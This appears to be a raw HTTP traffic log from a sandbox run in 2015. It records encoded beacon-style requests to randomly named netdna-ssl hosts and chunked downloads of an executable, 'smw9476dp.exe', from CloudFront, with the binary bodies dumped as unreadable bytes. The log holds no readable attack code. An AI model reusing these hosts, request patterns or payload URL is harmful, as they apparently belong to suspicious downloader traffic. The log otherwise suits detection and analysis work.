GET /22421.ashx?e=gwZ4/u7hMkLK7BVW0pZkfhb2ezGP2tbZIM0CqmsRfbtxTYwWxYG9WM2wWArmgLQLe/xsl9xq9FBosbTknH6Z5kCN9h bV19VdXQO8eCkzNk9LWPkwGrB/imF904v4t2DhvUiLCZht1Hw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:55 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /22421.ashx?e=tXVAHsxnBG7K7BVW0pZkfszkfVrW9tStIM0CqmsRfbtxTYwWxYG9WM2wWArmgLQLe/xsl9xq9FBosbTknH6Z5q1yMTX l/6f1Gg4F6dkBzXUfBgwh1qVrROUvSdX2iqn4U8uoq4rC8jC8FaAJlN651M0VcwJ5frh/bLm/j9YcRV23zceadiRZC/AFbVLp3Hi0MyGFWhm97EgudgSzDBDiV gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFmOdeW8Cm Pw= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:55 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /22421.ashx?e=tXVAHsxnBG7K7BVW0pZkfszkfVrW9tStIM0CqmsRfbtxTYwWxYG9WM2wWArmgLQLe/xsl9xq9FBosbTknH6Z5q1yMTX l/6f1Gg4F6dkBzXUfBgwh1qVrROUvSdX2iqnJyMz45O1xrVtQeXCcg/Fhy2/UUM264sa8NVcbx dWxSReJECB10wJoxWgtYjek0x0XbBjJK/aOU= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:56 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
HTTP/1.1 200 OK..Date: Mon, 06 Jul 2015 20:25:56 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......


GET /22421.ashx?e=oE Olq3N8DJfg3lhfO/2vlmLSUZKnG3B/lCDRYG1zoqOcTxdoMXoDozpbjeDHyvNqJDnlUORNKJFgAYD7IlOORzySwR 0UMpQDKCf8yUYWLlsZJ2yfMTtUEt4u7lqt3stPVdUM8KI09jNgiw50h3MkLiTrp3cOxvYCpHZc9ZUaGLbhvor/ikhRQC drCF7eF3rUREaMaDcYM9FSSDYOxx0COCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndge7ouA16n0iIBvLHla3W6ub3IRsoVFcpzK XYKCjTu0= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:59 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
HTTP/1.1 200 OK..Date: Mon, 06 Jul 2015 20:25:59 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /22421.ashx?e=hXeqmv1IpenVj9BNm3y5BzGi57tKDBZAmkbcHfsclGUeaFNcfNJ0DqkO9/DuORuprIIa1xct7Ik 99Kb8MNzlldQOXofA8VY1QHs3X92ilFBkBMfD9KDE9CUHeR8YCF38kle5tupXGHHMGUmhiJT7gXXflM9GuSQ8NVcbx dWxSReJECB10wJoxWgtYjek0x0XbBjJK/aOU= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:58 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
HTTP/1.1 200 OK..Date: Mon, 06 Jul 2015 20:25:58 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /t.ashx?e=KSz5qzb2KgKyCpK5vbxu3GMS6xMm5DPOHW55GOTjPfmmy6t0 u4xzf2TEkHeJNDUDPI5dGTWg78vFILB9JD7Z4ZVJDBzh9KRWLazpewXw1jXt7qcDfFhJwTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHG6KihZpGgAn HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: denq2hm5zt6-hvjtfa3f.netdna-ssl.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:56 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
abfgshdgfjhsk....


GET /t.ashx?e=KSz5qzb2KgKyCpK5vbxu3GMS6xMm5DPOHW55GOTjPfmmy6t0 u4xzf2TEkHeJNDUDPI5dGTWg78vFILB9JD7Z4ZVJDBzh9KRWLazpewXw1jXt7qcDfFhJwTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHG6KihZpGgAn HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: denq2hm5zt6-hvjtfa3f.netdna-ssl.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:56 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
abfgshdgfjhsk....


GET /t.ashx?e=KSz5qzb2KgKyCpK5vbxu3GMS6xMm5DPOHW55GOTjPfmmy6t0 u4xzf2TEkHeJNDUDPI5dGTWg78vFILB9JD7Z4ZVJDBzh9KRWLazpewXw1jXt7qcDfFhJwTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHG6KihZpGgAn HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: denq2hm5zt6-hvjtfa3f.netdna-ssl.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:57 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
abfgshdgfjhskHTTP/1.1 200 OK..Date: Mon, 06 Jul 2015 20:25:57 GMT..Con
tent-Type: text/html; charset=utf-8..Content-Length: 13..Connection: k
eep-alive..Cache-Control: private,no-cache, no-store..X-AspNet-Version
: 2.0.50727..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X-Cache:
 MISS..abfgshdgfjhsk..

GET /smw9476dp.exe HTTP/1.1

Range: bytes=250000-499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 02 Jul 2015 05:25:45 GMT

Content-Range: bytes 250000-499999/3973864

X-Cache: Hit from cloudfront

Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: tJz7htHrd_3NRMNhGX9Y7ytMfeuTspGLrJqkj3T7EzR6FIk63lPVTg==
....qS..4..e....7..*.`5....X..JW..1..Y.....~oMH.h^I..4.D... SqS.......
...'.6..../..w'.~...g.Z..k9(FT.D*\..9..v.wUwddjAY....,.5.......<..6
o.tS.....1n........%......v.).}..}.q.k.7H...V.D..HhD..t.e..NZ.yD."..^.
s}....y.S......J/\5(.....E...1B8O.7g'...G#...d.....b....f...\...6.....
.-..CU.qPz.C.......D...B}n]6.w}....W.E..h<...s .S.exKL.......$.v7..
|....m.....8.......f[n.[.y...t.(2......7...;^9.Q....3S.Z..........r...
.|.;,...O 7`-O.t......7.-3M.94n.Ry...A.U%......`.....`(..q..i...69as^.
$J.5.T.............gXy$zV.0..e.~.,B.hN.k...<[email protected]...@....
...t.2....U...N?...~./...K.Z.....j.1.5c..R}@J....).:......^.s......D..
....P;y...`.L..y~r...x..V.f....Xi..J..-Fp...1...............k'y.~..m1.
...V..E._.L.}c....0,.....V.K5. [email protected]?o......x.A....
h.pV.I.".T....bV.?...Rs.E].H.....`....sr.9 Z'.z.=. .d.`.......0....[..
P..T.7V..ROo.j...?.....>.F.D...v.?....~Qu.FI..8.ej.m~..."E..Z......
..ik...ssj..`.'.F..j..........8...Ad...(nn....(.*.F..s.-...4M.......$F
..*..H....5'/.=....pAn..J..B.A..l)..[......h..s7j..4.\y....V...F...2cf
....f'..c..\...,... `.....6}.jB.....h...^!...>......D.V..J...G....i
<...3..G..H.*.....n.....X.8f..Cw....Y.UV\..,NUV0[............g.1...
.: .].....}g...... ..........AZv ......P..y.s.Uca.F [email protected].{.....
K.p.S.G.......O.jy.ej..A....Jj...,m.4..,Q8J..q..H..L...`..X./......b`.
_L.5:.f.4Dz.:>. ..#X...e....O..o...^.\..........g-...........2.....
q..j.......|.b(6._...&O.......h..~.V..K................D...~.u..t.Y5.^
]%/...0.X......A.vp4...uJ..6.h.u..>..2....6Q...A.1R......H....U
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=750000-999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 02 Jul 2015 05:25:45 GMT

Content-Range: bytes 750000-999999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: n0A57sbpjGoKqfjJrBy0-vgdXeuDX_r5sXPZlN8NFHs3l_17QZJahQ==
j.%...Q.....t...U.yx6_U..\C0.i=.W8.....x.e|.....u..P......._...7..m..g
.....m.#...E..JD......{[email protected]{......,K2knQ.Z1..q3{.IVL..PB).3.........
........me........".q...v..jqm.....,e....Z-.:...}a.v.........BV[3....6
v.....U.<a5q.....:......A..!...{.k......W..U..L%..Z..cGUgs7..t... H
......I..I......FN..&L..#...B..hWg9,....r.i*E.r.u.._...^.._...B3..../.
...R......X..i.B...<.0...DT]...}......iA..]**{..U...C)|?B....$....G
K..|...Cr"...IV'..^........W.5./...'.m`..'..LI#.Us.0n.s:Hw..Ed?3...V.O
.zIC..1...XT.i...\fA.&...XC.!..S_%2=..i0K....f...6...;..`..].`....$Z.^
.....r!.Y.. $....Yjg......r"G....V.hk&....Z..).&b.$.[ <&..z`n.V....
........t.....(.c.W...`9..7&...]..=.X..461......}*...][..a.7.a.L......
.S.N...M-..........Y4.......I.$C..O]..f....#.....p.....f0.8...p.Y=OP.$
..nC'.:.B.....>..P..p5...D....~.2....@:..C...=..yc...s,....d..\..6.
......L...}.>/...I...ab.......M........\d.G.7\.[.....k..[u.>..?t
.......z..a.s.2..:Ys/}..Y....P,...//..OP...g......n(w2..*Y.....)...<
;......jL]p%q ..=.I.%.=M@..<....dI.|.s[..6...O.9.....%..tqZr/O .gL.
)...u..O.A..CiF.gw.t3.....i.R......#....^]..Q?A.U-*........O....`T....
.tj,h...a...z.j1....Xr;..\(..Y6...n....,4.Hm.B.|.,..PxU...A*...o..[?..
.XsjnKK.*cD....)dOQ..!.}....N.....u.i.-......W...3...T.y'd."....(....&
lt;..ww....y[L....[...J.>.O9.....)...!p...ic.f..J.M....@[.../...HC"
..c.....m.. ..o.g..l..........E.....^....].^..r)% .-).j .I).SZ.c. .wtI
.q..&.0....o.&......{..t..,..[2.\... x....[..".D..>W.'...c.!H.....j
...ODo....w~...a1..V......mJN..J......@ .pj...3U;z,6.C.~.......9Z.
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=1000000-1249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 02 Jul 2015 05:25:45 GMT

Content-Range: bytes 1000000-1249999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: qQptV_YuO98cjv2K_HSd7X3KUVdHL1rUMU92EpkQDNWbKMZ5043tdA==
.4... ..]..E.....X.>$....q....%.N...u.k..p4........!...t..[.R....I.
B......X.Hbx.;F.>v`.H.#.I..;E..L.Q.eN.. ..h=.j.M..sJ...Bq..;a......
.L.....f.r.}....st n..~5rL.5.<Z....Z..).X.R....K.t..E...f.?.....nT.
k....2M....X;....s.$Q...6Z..R..3.cY.>[email protected]
6..7...g`....T....."..;.<..KV.!Y.d.z..(.........hi"[email protected]_)
p.:..jk.N..5OWM..[......S:'.m$.....'.1Be......X.L.H'>..~...a.tk...V
Q.. .K'.(.Fp%..v..`.:..K.=..hp.5.....M..) .I.K..S.Z.9.x.U7z..M. m..FA.
...c....yo..b...1.9#1. H..L....c.b....qj.....>.....C..N.).A$..;...}
.I...p.r.H...(.s]|0...[..(.8r..<^5a...A.....j]...c.... R..$(.f2u..C
x-..`.C.|B$N:.}.F.`b.d..o0P.r...f..3...............JoM9..$...Y:.......
1..............O6...E O#.K6{.?$-....wU...L....R.L.k.|...5BH8...HK.>
....&.`..;.kE.bt..w ...".OS.|..^.6Oa....o=......$...j\.M..B.O).').....
&...4..1.~..X.......lM...[.....<]. ...o...j.p.w2.U.w...a..!....x.kW
..".. .]:.....${s......qz..........(.h.z........k..}.[.T1...K...X.{(x.
..y...<.........t..[.~h..eM...*.v..M...f.Cx.u..1.ÛC>....o....~
.\. .E..~.h.........o....WE.=...6N...[....22.{s..J..nx:..i.M[.....c. .
._. .F.......ASZ.i,....tQ.`.......Q'......h..e.?53...H.9=...._......m.
.....P.I...0}.S...\...F3".(...'..8F.....8.).._........v.6P..1..6...i..
.....'..............,8...;.e~...Y><V.......K{u'..h*.o.&..L......
jb.....'...|M...iY..Jw....@T..`..|..........A.D.a.x...q.T.1A.`..S.jc.W
..>"v.].dK...(..{d..V..D<.R0a.C.. .K...... .n4..l@..~>.8.^.o.
..W.....I..?4..I.d.SS/....m!.......9..R..U..H..."...9..|...m....F.
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=1250000-1499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 02 Jul 2015 05:25:45 GMT

Content-Range: bytes 1250000-1499999/3973864

X-Cache: Hit from cloudfront

Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: KwvQ1mYlri-wZq-z9Qq4_l12N-nwiRq8RZHZ9ANXcbJqG2fbHyxASg==
.C.Q..'....._L."9 ..v..Z.y...1.............'..MZ.a!".. ..B...#.......a
b.~M.i......r.>M..{_.\.v..4R.. T.x$.ai....*.BX6-.....6...)......#..
?.k-....L...KF..............._.......A.H..B...P..[...~..?........;.j=.
t..o?.].v..3...s..^>.FV.8.H.R.&,.}.lb....Ew./....e#[email protected]\.$#...
......q.Cl.WRqP..h..7~c?.x.GS.lp%.!VcG...}]X.C.8Ut......e.C^...u.....W
[email protected]...<xf.6........R3...r_..J. ..y$..a"
....r^.S..i5.\aD.t..Q.gk2%a...F..:.e.`...... ?.v.7{.e..f=.9.h^:^U...q.
.R....I...ueHA.p-.m*.k!.a........y....q.I......./......q.V....f!....M.
j..............L.#.6$./.mu0..5o/....Y..#[email protected]!d..<.\..z.....N._
6...../.e....V......._.Z.5W..H.Eb...w..v.9.A..n.$x.`d.t.r.....t.Zjb...
.,......;..:cd_C.I....sJ..a}.$.z....F.....(C0....7a...... bp7.."j..j..
1....e.q.3.....a.M...k..N.....rO.P..C.>..Q.;.....t..,...U..2ogp....
M{)sod....'8..M3b..... f].d..Ae,......J.~rYX..&xqC........oo.g.Ll>.
)...1Y!...6b...K.X.yk4.].....E4.r>31F.>..'$/o.,[email protected].^
B9... .....cv.UA..).D,....p.'.R..w............8.7....B..w..<.......
.......RA....,UU...|.:.kc...l$...T.F....|..Z.oD....s.).....I..a...2...
5)L.....L.Y.(....U[..xL...Y...]....=q.U.|5~..B.b..u../...#...vxZ...T.c
.....2.L.........{..Z-.s.....X.av..M~F........^.....r..7.M.....;[.....
...k.-*...m....A.7..n.WaSq.....f.ii.w... `....WODp).......].$1.z..y^..
ZY.....I. ....Y..oL/...X~..q........f..8..A...y.~.....`_..!.yb.M.O..a.
T...p..N..N.........h$.$.[j....v............G.:Ya.W........ .'F;Z..3..
..~..W4..A...b%b.....:H..x..h.UY8..X1.....".8.J...l.a...M...5....1
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=1500000-1749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 02 Jul 2015 05:25:45 GMT

Content-Range: bytes 1500000-1749999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: xAI8-aAZKn370UhJwa0RN-C4nbhPXP_K4RxQ20BAXtspBoytCDoDtA==
.[........_T....8rxU....6........b.:...%p`..W.4]......Ev.=D..g..H..#..
.67{..K6.}.6..Q6..z....T.._....1L....s... *...D;..0F..R.x.T.7k....G.Xc
..;.)......^..Wh..]...cU...O....c..[~.Y.1 ........ \...c..[..M..K.....
qx.~...P..j.._]."U..ve&...5.tc..h..r[..."...S.d...D7f:.[.....-..{.....
.....c....R..'D..B......=E......E..L..pI.....=4.........y_.V....{....^
2$...n.......L.c.p.....y[([email protected]...)A0o8.........i=7..
0....peS........2.sx..?L....e {f..r..(gz.w(C...K>....W.....s..!.<
;$..w.MR..%`j...l...Q@K..|".Q............K.....~&.Kj6w...q...G...~.DT4
.E..........~.....Pp Q.U...S.......4...-.V..n...k...X..%g.E.R.].._W..M
..-.k.PX...z.-3..........L`.{V......)...N0.K..A...H"pN]%.......d.`..c-
G}.Z.B....e......M..Z.o....T.y.`..j.t...G......f.j....L.....?{.....-..
...I,....=....G..a.......K4.......P^.%...i..N1..Y..V...,\.W.o....,A...
.[O'...:.e!....J.......#.U......i....}>!!.iJB9j.........8.6VD.*x..H
...>S<...W.>.9.9(2.F.9..]7..)Gx.S...[.......O....U=K......r..
.s7....<6.......7.h.SSJ..V.N....u...).cz..,x6..EX...{p....~`6.v=..M
 "..s.K.=3(U......8..^@.Y....q\..#V8A7<.Qk..,..AK.EE....u...F.~...v
T...T..s.61...zzq.....2.s,.......A1..*&..A....~..8@~$.O}[email protected]
.........2.k.tj.......4.x.......}..d.........N...3....5......]..EG.3~.
.`.=.(.....0&o.L8...Q.../{.$..l...znm.pi*.B....HD...........T.%....j..
.#...}R O..|[email protected]... ............oyW.w..6. .8&Z....B.S.P..=Y.....9...Yu
.c..A'..`......L.>.....Z.5.....I..4... .a..zYB....H.{.z.L.mZ.|..8..
d;[bhI..Y.....j...<X"...W.l.".).y>.......YR..&."XPg.<...c
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=2000000-2249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 02 Jul 2015 05:25:45 GMT

Content-Range: bytes 2000000-2249999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: WDAMLujnEZ0dLLAEmg1_WLstRry8jc4mnTtCeqffXZYetXX6P4CW3Q==
E{...........D..2. A.z.Y.a.>.8..U"*..>.v.[.].K..(....K...O....0.
*`.`8.Y.P...u5..c.K..1jJ.y.p[..p.9O1.y..EV..d.ds.....O..6..0.......@m.
*.@ [email protected].~...%[email protected]*..n..,....HG)....6
...{..S..ys...#C4...&3.<...Q. ..qk7.....A...I.#..Z...1.4r..e".&.E..
.l.a]&.ld.kMt]`...n..\....s._.;.......MfI.....1....S......^j...s.P....
...#.......W.....{.....'...*......8.QZ...w.q....a8.5..d...;....?..#...
-...P....5......^j...y..I.z......W...i.[y..........F.[NO*.1..J.3...n..
h.]....[........7..e`..3.}...(...;.......o..@,...6n...e Us..@[...#..Yw
.e..9...$....~HN.......lZi...H.~d..O...k.....jk.}.@#...e.4.M}...V.....
.u...s..N2.H[6.?.^......gB.;.... r.C..m.I.&...P...E.$...`t..j*..t_....
L......l...1....>.|....d...dL.^.....Re&~.^.k..Y...xz..A/...].(.o...
.N.j..&d.<.... .7..D...rA....Y....p.|.....U.......o..z.....#.xN...e
.yr.Xto.d(.9..n.....6%m..[)b.......L.Lc8F..~..J.......u...=........u..
*[email protected].?....h...K..Wh[.Q6Axt.;......}......2..pv..sf.>..[EW.i\.S|B
.....k~..o..T.v.x..o...q6~6.E0......9.$.d.#S[...E.x.i...........:.15t.
....E...il.._..Y....3.S.jLij.w......7.[..1.).?F......D1..t;pz..W..C_..
.....^.3...]Jb.....K1>|.y."...]"P.q..;...{.X.zQ.D....E..z....aD>
8.."..V*. ..c.Z.vA...8....R...fW..>....1...|. -aa.....S...*.....p6k
%.....Eqi.<.%.#..c...r..:U.h......&J..0...v-.....P..G....J..^.R..$a
.....U.......C.?".......N...#......>Q.....2.....7p....T..$?3..1{#..
c.Uj....Y...YFRM......TJ.....gG.&*nd%.=.z..v..Q.`5..A..@_.{..O........
)[email protected][.x..7....~.....RI.3S...1.g.k..~JV|...3.{........7.l..
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=2250000-2499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 02 Jul 2015 05:25:45 GMT

Content-Range: bytes 2250000-2499999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: lYUlXLNs7WUzsm7TV_8KMmXYcFn2y-hfFMWadkAtdCUr7rEndzHwVw==
..5...N.au....H...E.....Z..a..;...h.<.P.{....S.0.....;...*.(d~O.t._
.S.D.....*F.`q.b.../~<.X..T........'.{.f..0..*.lD.<...NR.B'.2?.#
.|CJ>Py..{$.k..{.'..L|..,.\).>..Y.{.~_.*P:?BO>.:JN....z[..g..
.}....SX.L.Z..j.........}x.8...r....V.........>_..e!V....W .. VQ...
t....Mb;.yV.U....=.`C........G..n.p..y4....^.|.@.%..3....z..$.p..reu&l
t;?..W.......9...}..F.....u.. ..u....qwI.%{.{.....B8.I.....u.....\.h:W
z.i..... ..M6..>..<.#N#SyQJ....,.'..!T.....m..25..7......~y.....
h.>....i...).........3'_......oc....'.o.-.......D.R.U'.......[.K.;.
..........n,.^.|vFw$.B....y..^Lt.....M.........E.Qb|S..I.-.o.}od.X.c.8
y....wls...j.....\.?Q<n.;..n.h"j\.j...<7.......^&4?!p#g..&..>
c.^......n)E...F....v.3O......t.!6;[O.>R?Q...V...._.dk[..X.....'4./
Vc........k"B3x@W....\.........m..Y.US.......W\>.G.........Ty.dR.w.
...m...o!...-...V.X...0o.[9./*.,...%.&.CX..H6=.......t...,kk/.A.f.jqbu
.w..j....q| ...#N.....$.9E1b#6...O.. ..G.....................bc."...K"
....hb.......@.(..v..E.%.! .(........}.^...]`...}[email protected].......
.`.......qi...cy.O.S...H..d..*...../....QC4s.;.C......c[-'A(.T|...(..I
[email protected]".4}....P.pXE.B.,@7.@Ox[M?........p-.4.1..K..w.}....5g.....W8...
...X..(..-...f.PP.>....=>YN.U0.*..8...F4.. .Y.-j...#.).....w...S
Tn8..e..z...@>....\."...H.d6.~FP...).K..d.*'.>..?|\...J1Y....ZYG
.....[.....F1.-q)......[5..R.f.j....../...rD..~...`.W..;.2k0./....._p.
E..?..".N.HS).._.1~.T.....0.HEr...v-.8..*.................HT.t.<.:t
aC......U.,.."....I.......<...>j1.?.........q...U.....--...b
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=2750000-2999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 02 Jul 2015 05:25:45 GMT

Content-Range: bytes 2750000-2999999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: gOtgIjUGBA7TL4dD_W6niV3ZC5PP9tIL0oeMhsUIJSOEBiXCP1pvrQ==
......$L3..@...@ *.*.|......E=v.wVz...}.....E...c..,..Z..........<.
..-y...7.B...E.`.....L... ..m....O...Y.).P.w.....F..WB.5#..}6a?...C.f.
...4..mm.....m.S.../.Nr/........-.".....b..n:..fL........l.f5m.....(I.
.....x.....oT.wv.C.......{....O..O....Gp.\..../.$...9xy...o..._...5.A.
X...ev4.#d...h.F..mi....T......V.......T..9h.Tw............!./vh.i....
..AU.!PBW.e....... ...U.AST,..5..^.SK.O....,..tH..&9r....> ../.wa%Z
.$.q.y.5?n....T?........."..}.c.9c?Q..*=.-.KQSS .K..h...}.".6..!....}.
G....!V....q.m$b.........*.A...eiW...g%.h.#. .3z.)...m..b.`..#..h.\.x.
 #.K...=.l..I....t.K......2.k%......A.S.(:...[[email protected].
.[.RB....... ...-X........2.T8./.a.k...S.....0...."S`..R...Y{......#.`
